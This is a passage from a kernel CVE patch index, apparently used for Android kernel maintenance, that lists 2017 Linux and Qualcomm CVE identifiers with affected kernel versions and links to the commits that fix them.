https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/driver-core.git/commit/?h=driver-core-next&id=6265539776a0810b7ce6398c27866ddb9c6bd154 -CVE-2017-12153 - Link - 3.2-^3.16 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.2.94&id=082d8a6a55d2b6583d9e93ac9796efdf4c412658 -CVE-2017-13080 - Link - https://github.com/torvalds/linux/commit/fdf7cb4185b60c68e1a75e61691c4afdc15dea0e - Link - https://github.com/LineageOS/android_kernel_oneplus_msm8974/commit/39fb5459ecd16779e75d76827fb32d15a995f469.patch -CVE-2017-13080-Extra - Depends - Link - https://github.com/LineageOS/android_kernel_lge_hammerhead/commit/6fef7504fdb639dea2fbc0cbbd10963953f443da - Link - https://github.com/LineageOS/android_kernel_lge_hammerhead/commit/a9803a869bfc274d57ab33862ad7a5ea31df4559 - Link - https://github.com/LineageOS/android_kernel_lge_hammerhead/commit/dc0c59d66b8679dc870c9aa568647d0be71501b7 - Link - https://github.com/LineageOS/android_kernel_lge_hammerhead/commit/706ccb5adc54e349c491ebeb462c121d6467c863 -CVE-2017-15265 - Link - ^4.14 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.18.76&id=035e6d0b5b192ff5e168ed322304d29db108d790 -CVE-2017-2618 - Link - 3.10 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.10.107&id=a71b4196a72f09ed223d8140de7fd47ccdaf6e2b -CVE-2017-2636 - Link - ^4.10 - https://git.kernel.org/cgit/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=82f2341c94d270421f383641b7cd670e474db56b -CVE-2017-2671 - Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/net/ipv4/ping.c?id=43a6684519ab0a6c52024b5e25322476cabad893 -CVE-2017-5546 - Link - 4.7-^4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c4e490cf148e85ead0d1b1c2caaba833f1d5b29f -CVE-2017-5547 - Link - 4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6d104af38b570d37aa32a5803b04c354f8ed513d 
-CVE-2017-5550 - Link - 4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b9dc6f65bc5e232d1c05fe34b5daadc7e8bbf1fb -CVE-2017-5551 - Link - 3.14-^4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=497de07d89c1410d76a15bec2bb41f24a2a89f31 -CVE-2017-5669 - Link - ^4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=95e91b831f87ac8e1f8ed50c14d709089b4e01b8 -CVE-2017-5897 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=7892032cfe67f4bde6fc2ee967e45a8fbaf33756 -CVE-2017-5967 - Link - 3.10 - https://review.lineageos.org/163292 - Link - 3.18 - https://review.lineageos.org/170669 - Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/commit/?id=dfb4357da6ddbdf57d583ba64361c9d792b0e0b1 -CVE-2017-5970 - Link - ^4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=34b2cef20f19c87999fff3da4071e66937db9644 -CVE-2017-5972 - Link - https://github.com/android/kernel_msm/commit/e994b2f0fb9229aeff5eea9541320bd7b2ca8714 - Link - https://review.lineageos.org/#/c/181001/ -CVE-2017-5986 - Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2dcab598484185dea7ec22219c76dcdd59e3cb90 -CVE-2017-6001 - Link - 3.2-3.4 - http://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?h=linux-3.2.y&id=9eb0e01be831d0f37ea6278a92c32424141f55fb - Link - ^4.9 - https://android-review.googlesource.com/#/c/438399/ -CVE-2017-6074 - Link - ^4.9 - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4 -CVE-2017-6214 - Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ccf7abb93af09ad0868ae9033d1ca8108bdaec82 -CVE-2017-6274 - Link - 3.18 - https://android.googlesource.com/kernel/tegra/+/0f08eca74276e7ebab4b712d98970c6425207ccc -CVE-2017-6275 - Link - 3.18 - 
https://android.googlesource.com/kernel/tegra/+/0f08eca74276e7ebab4b712d98970c6425207ccc -CVE-2017-6345 - Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8b74d439e1697110c5e5c600643e823eb1dd0762 -CVE-2017-6346 - Link - 3.18 - https://android.googlesource.com/kernel/common/+/be671c7e17454b4f144a8e05268a6071748a8791%5E%21/#F0 - Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=d199fab63c11998a602205f7ee7ff7c05c97164b -CVE-2017-6347 - Link - ^4.10 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ca4ef4574f1ee5252e2cd365f8f5d5bafd048f32 -CVE-2017-6348 - Link - ^4.9 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4c03b862b12f980456f9de92db6d508a4999b788 -CVE-2017-6353 - Link - ^4.10 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=dfcb9f4f99f1e9a49e43398a7bfbf56927544af1 -CVE-2017-6421 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=be42c7ff1f0396484882451fd18f47144c8f1b6b -CVE-2017-6423 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=0f264f812b61884390b432fdad081a3e995ba768 -CVE-2017-6424 - Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=8cac3c4aac106b917e60e7aa7d4c4189e376913c - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=5cc2ac840e36a3342c5194c20b314f0bb95ef7e1 - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=4e44b25b26a594aa818 -CVE-2017-6425 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=ef86560a21fe1f256f6ba772a195201ff202c657 -CVE-2017-6426 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=80decd6365deec08c35ecb902a58f9210599b39a -CVE-2017-6874 - Link - ^4.10 - 
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=040757f738e13caaa9c5078bca79aa97e11dde88 -CVE-2017-6951 - Link - ^3.14 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=44d6e10f77095133e3882529a16b686b2305e6b0 -CVE-2017-7184 - Depends - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=677e806da4d916052585301785d847c3b3e6186a - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f843ee6dd019bcece3e74e76ad9df0155655d0df -CVE-2017-7187 - Depends - Link - 3.4 - https://review.lineageos.org/#/c/182338/ - Link - 3.4 - https://review.lineageos.org/#/c/182339/ - Link - 3.4 - https://review.lineageos.org/#/c/182340/ - Link - 3.10 - https://review.lineageos.org/#/c/175571/ - Link - 3.10 - https://review.lineageos.org/#/c/175572/ - Link - 3.10 - https://review.lineageos.org/#/c/175573/ -# Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/mkp/scsi.git/commit/?h=4.11/scsi-fixes&id=bf33f87dd04c371ea33feb821b60d63d754e3124 -CVE-2017-7277 - Depends - Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4ef1b2869447411ad3ef91ad7d4891a83c1a509a - Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8605330aac5a5785630aec8f64378a54891937cc -CVE-2017-7308 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2b6867c2ce76c596676bec7d2d525af525fdc6e2 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8f8d28e4d6d815a391285e121c3a53a0b6cb9e7b - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bcc5364bdcfe131e6379363f089e7b4108d35b70 -CVE-2017-7364 - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=3ce6c47d2142fcd2c4c1181afe08630aaae5a267 -CVE-2017-7366 - Depends - Link - 
https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=f4c9ffd6cd7960265f38e285ac43cbecf2459e45 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=7c4d5736d32f91f0cafe6cd86d00e26389970b00 -CVE-2017-7368 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=143ef972be1621458930ea3fc1def5ebce7b0c5d -CVE-2017-7369 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=75ed08a822cf378ffed0d2f177d06555bd77a006 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=ae8f1d5f60644983aba7fbab469d0e542a187c6e - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=05f4374845738d2146075e77d9139e60a558de18 -CVE-2017-7370 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=970edf007fbe64b094437541a42477d653802d85 -CVE-2017-7371 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9d5a0bc7f6318821fddf9fc0ac9a05e58bb00a6b - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=e02e63b8014f7a0a5ea17a5196fb4ef1283fd1fd -CVE-2017-7372 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=1806be003731d6d4be55e5b940d14ab772839e13 -CVE-2017-7373 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/linux-next/akpm&id=eac4a77bb71750b02e91508b15c9aaf4fe2b94ae - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=e5eb0d3aa6fe62ee437a2269a1802b1a72f61b75 -CVE-2017-7374 - Link - 4.2-4.10 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=1b53cf9815bb4744958d41f3795d5d5a1d365e2d -CVE-2017-7472 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=6efda2501976288f10895834ba2782d0df093441 -CVE-2017-7487 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ee0d8d8482345ff97a75a7d747efc309f13b0d80 -CVE-2017-7495 - Depends - Link - 
3.18 - https://review.lineageos.org/#/c/175288 - Link - 3.18 - https://review.lineageos.org/#/c/175289 - Link - ^4.6 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=06bd3c36a733ac27962fea7d6f47168841376824 -CVE-2017-7541 - Link - ^4.12 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8f44c9a41386729fea410e688959ddaa9d51be7c - Link - 3.10 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.10.108&id=7136ca73ff3496758b56f60b6fe76d675e69cd21 -CVE-2017-7616 - Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cf01fb9985e8deb25ccf0ea54d916b8871ae0e62 -CVE-2017-7618 - Link - 3.0 - https://github.com/fourkbomb/linux/commits/4a0d9b8d06893c56c7e66fcf8d91ef67770cf9ef - Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=c2798145e731005fa1e6ee2a489940c1dd8f03e4 -CVE-2017-7889 - Link - ^4.10 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a4866aa812518ed1a37d8ea0c881dc946409de94 -CVE-2017-7979 - Link - ^4.11 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e0535ce58b92d7baf0b33284a6c4f8f0338f943e -CVE-2017-8233 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=64b7bc25e019dd07e8042e0a6ec6dc6a1dd0c385 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=8b0cb658b568e4b160a5b57fb3cef0063aff56d9 -CVE-2017-8234 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=6266f954a52641f550ef71653ea83c80bdd083be -CVE-2017-8235 - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=7e4424a1b5f6a6536066cca7aac2c3a23fd39f6f -CVE-2017-8236 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=8a079632f447be9fd86f92b8e02b1940a26c8a2a - Link - 3.18 - 
https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=cf0d31bc3b04cf2db7737d36b11a5bf50af0c1db -CVE-2017-8237 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=342d16ac6fb01e304ec75344c693257e00628ecf -CVE-2017-8239 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=01db0e012f86b8ba6974e5cb9905261a552a0610 -CVE-2017-8240 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=22b8b6608174c1308208d5bc6c143f4998744547 -CVE-2017-8241 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=90213394b7efb28fa511b2eaebc1343ae3b54724 -CVE-2017-8242 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=6a3b8afdf97e77c0b64005b23fa6d32025d922e5 - Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=364643660e49ec22f657d3e624bee2c7b9738d98 -CVE-2017-8243 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=cae0d5a6f32e52e06c0841bb7142452062dc2ac8 -CVE-2017-8244 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=f51b0f3b9da62e96b0167a3eb3376fca39fc7baf - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=01673e148223c10782b03c5485aff2a82b1900c4 - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=fe3bdd12315656347d1bca82d920b3df1a2b0e8a -CVE-2017-8245 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=ececf97911515114030bef1fc6df630dbb706f17 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=f53af3805879292423465cd0877cc7a75131ce10 - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=5b2f6e011ba92f28e8d7dbeb11c4ee7344c33186 -CVE-2017-8246 - Link - 3.4 - https://review.lineageos.org/#/c/185429/ - Link - 3.4 - https://review.lineageos.org/#/c/185430/ - Link - 3.10 - 
https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=578eb74435eccdc3df516fd744941a7d872fac6c - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=30baaec8afb05abf9f794c631ad944838d498ab8 - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=9734b72ae21eca557540c3c42d356dd131a20004 -CVE-2017-8247 - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=84f8c42e5d848b1d04f49d253f98296e8c2280b9 -CVE-2017-8250 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9be5b16de622c2426408425e3df29e945cd21d37 -CVE-2017-8251 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=3a42f1b79ed696f29350f170c00f27712ae84a36 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=771254edea3486535453dbb76d090cd6bcf92af9 -CVE-2017-8253 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=a5f07894058c4198f61e533d727b343c5be879b0 -CVE-2017-8254 - Link - 3.4 - https://review.lineageos.org/#/c/188837/ - Link - 3.4 - https://review.lineageos.org/#/c/188838/ - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=70afce1d9be745005c48fd565c01ce452a565e7e -CVE-2017-8256 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=75e1e00d6b3cd4cb89fd5314a60c333aa0b03230 -CVE-2017-8257 - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=0f19fbd00c6679bbc524f7a6d0fc3d54cfd1c9ae -CVE-2017-8258 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=31e2a2f0f2f3615cefd4400c707709bbc3e26170 -CVE-2017-8259 - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=68020103af00280393da10039b968c95d68e526c -CVE-2017-8260 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=52a2a62a5b0e9dd917bcd9a6d86d674833cc91b7 - Link - 3.18 - 
https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=8f236391e5187c05f7f4b937856944be0af7aaa5 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=7b7534d96813ffe502271b0b3fae0d0d12e3e05b -CVE-2017-8261 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=2a2f0b7463f4de9ca225769204ff62c71760709c - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=8576feebaf688dadf0548b9a16d2b90b76ed714c -CVE-2017-8262 - Link - 3.10 - https://android.googlesource.com/kernel/msm/+/6e95883e47953902ff6a5125a12cf83aa0a7de69 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=20c8f1c393ec2726ac46642ae8883643f2427c4f - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=9ef4ee8e3dfaf4e796bda781826851deebbd89bd -CVE-2017-8263 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=2a2f0b7463f4de9ca225769204ff62c71760709c -CVE-2017-8264 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=4268b75208ca04bc63dcfadbb9a1eca8e964a697 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?h=LA.UM.5.5.r1-05100-8x96.0&id=53c6b89349730765a71722d274fc3fa41287d21f -CVE-2017-8265 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=193813a21453ccc7fb6b04bedf881a6feaaa015f -CVE-2017-8266 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=aa23820b001ab1cfb86b79014e9fc44cd2be9ece - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=42627c94cf8c189332a6f5bfdd465ea662777911 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=64e4e29356928bea60ae4be5b387eb7d8d7a7f45 -CVE-2017-8267 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=2a2f0b7463f4de9ca225769204ff62c71760709c -CVE-2017-8268 - Link - 3.10 - 
https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=5f3b68da4c8f6474df2497b6d912465d640904b8 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=fab64410d005a7dee8ed02557a0ca26e4c5242ff -CVE-2017-8269 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=b925d9f76164475abb6f6a557327095156c9b249 -CVE-2017-8270 - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=ff96565f1dbabfeb7fb2c1604f40af768579d9df -CVE-2017-8272 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=a8cb976e7c8f25191728b655e0b38328a6d7d81f -CVE-2017-8277 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=c9a6f09f1030cec591df837622cb54bbb2d24ddc -CVE-2017-8279 - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=f09aee50c2ee6b79d94cb42eafc82413968b15cb -CVE-2017-8280 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=49b9a02eaaeb0b70608c6fbcadff7d83833b9614 -CVE-2017-8281 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9be5b16de622c2426408425e3df29e945cd21d37 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=9b209c4552779edb86221787fb8681dd212e3a0c -CVE-2017-8890 - Link - 3.4 - https://review.lineageos.org/#/c/173325/ - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/1853870b216d3446efd39190a8ff0006c54dfd46 - Link - ^4.11 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=657831ffc38e30092a2d5f03d385d710eb88b09a -CVE-2017-9074 - Depends - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=linux-3.2.y&id=ad8a4d9d3f255a783d534a47d4b4ac611bb291d8 - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=linux-3.2.y&id=f7c2d2d7ebf9a110cafbe53199457c318f61a192 - Link - ^4.11 - 
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2423496af35d94a87156b063ea5cedffc10a70a1 -CVE-2017-9075 - Link - ^4.11 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=fdcee2cbb8438702ea1b328fb6e0ac5e9a40c7f8 -CVE-2017-9076 - Link - ^4.11 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=83eaddab4378db256d00d295bda6ca997cd13a52 -CVE-2017-9077 - Link - ^4.11 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=83eaddab4378db256d00d295bda6ca997cd13a52 -CVE-2017-9150 - Link - ^4.11 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0d0e57697f162da4aa218b5feafe614fb666db07 -CVE-2017-9242 - Link - ^4.11 - https://github.com/torvalds/linux/commit/232cd35d0804cc241eb887bb8d4d9b3b9881c64a -CVE-2017-9676 - Link - 3.0+ - https://github.com/LineageOS/android_kernel_motorola_msm8960-common/commit/d109d8d7e2998a635406215a559e298fa7ef4bb8 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=c1f749639030305a3b02185c180240a8195fb715 -CVE-2017-9677 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=b62291edb424281ed31a4e15140b16972ce9eef1 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=dc333eb1c31b5bdd2b6375d7cb890086d8f27d8b -CVE-2017-9678 - Link - 3.18 - https://github.com/android/kernel_msm/commit/420d0dc1b4563880f962002e8cb21e733bf074eb - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=ad8e758d30164290a71d9c59fbf7854029556a3e -CVE-2017-9679 - Link - https://github.com/android/kernel_msm/commit/31f54e33d88c676bedb64127b5ae0c60d06f9518 -CVE-2017-9680 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=dcd0a696c33dd3ab824151833d787f3ff90abbba -CVE-2017-9682 - Link - 3.18 - https://github.com/android/kernel_msm/commit/cd821a40b76919b0815a9a7c09d0f6cf1f15a7ee - Link - 4.4 - 
https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=1c4ddc4c7a4fcdf9371048ce01a6b0e5d2a2bae9 -CVE-2017-9684 - Link - https://github.com/android/kernel_msm/commit/d3d636627c8bb57a64bfadcc5d282c35d152f563 - Link - https://github.com/android/kernel_msm/commit/83cf9f50cda5ab3f99055242bebbcb26d96319ad - Link - https://github.com/android/kernel_msm/commit/b2fa897c8e86362946ec524ed47300164a33453d -CVE-2017-9686 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=de875dd095d3ec0906c77518d28f793e6c69a9da -CVE-2017-9687 - Link - 3.18 - https://github.com/android/kernel_msm/commit/34cff2eb2adc663de32ca682b57551c50c9253c6 - Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=8f1a77f5da53edd2b5a1c42ddd766712a90109d6 -CVE-2017-9690 - Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/b59b67fbd2f1d4f71e7a4f9e6723f04b717efc74 -CVE-2017-9691 - Depends - Link - https://github.com/android/kernel_msm/commit/869bd2cd3d6c17826b6f162e0d721174224b867a - Link - https://github.com/android/kernel_msm/commit/04468bc1d72f15e6b8f19014e8c6203038dd6b23 -CVE-2017-9692 - Link - https://github.com/android/kernel_msm/commit/7a86f369594a0b6567820b77d441e778e6adb8a7 -CVE-2017-9693 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=05a5abb21e4d97001f77d344444a3ec2f9c275f9 -CVE-2017-9694 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=1e47d44de7bab5500d27f17ae5c4ebebc7d2b4ef -CVE-2017-9696 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/8b44a684139301fa31548e8120b7e6299965572a -CVE-2017-9697 - Link - 3.18 - https://github.com/android/kernel_msm/commit/4b788ca419ec37e4cdb421fef9edc208a491ce30 - Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=7e45e3a6c1f6dd46d71fb6824a7cf702d2e79225 -CVE-2017-9702 - Link - 3.10 - 
https://github.com/aosp-mirror/kernel_msm/commit/2ae1eab54e874553c078e5275421398597401ac9 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/c46b2ecd901a12867d0dd91ae019f4b7256bcfec -CVE-2017-9706 - Link - https://github.com/android/kernel_msm/commit/7489a0a8f68d0f018d0f9df5df157bb20f83b05e -CVE-2017-9714 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=aae237dfbaf8edcf310eeb84b887b20e7e9c0ff3 -CVE-2017-9715 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=58350a7bcb827c0ac81f0750a62d5c5a8ed3a469 -CVE-2017-9717 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=bf7486fb6d82fb9ad02e303b6fdf4061cfc0375d -CVE-2017-9719 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a491499c3490999555b7ccf8ad1a7d6455625807 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=d815f54f15d765b5e0035a9d208d71567bcaace0 -CVE-2017-9720 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=c74dbab508c7c07d8e2cf8230cc78bff4b710272 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=737f415a5c637802786ec6d36288220cb4d3ae4d - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=2c5616295a5411812188f515d6ecf1984b9c1798 -CVE-2017-9724 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=5328a92fa26eabe2ba259b1d813f9de488efc9ec -CVE-2017-9725 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=5479a3c164c8762b5bf91c5fae452882366adb6a - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?h=aosp/android-4.4&id=1f8f9b566e8446c13b954220c226c58d22076f88 -CVE-2017-16525 - Link - ^4.13 - https://github.com/torvalds/linux/commit/bd998c2e0df0469707503023d50d46cf0b10c787 - Link - 
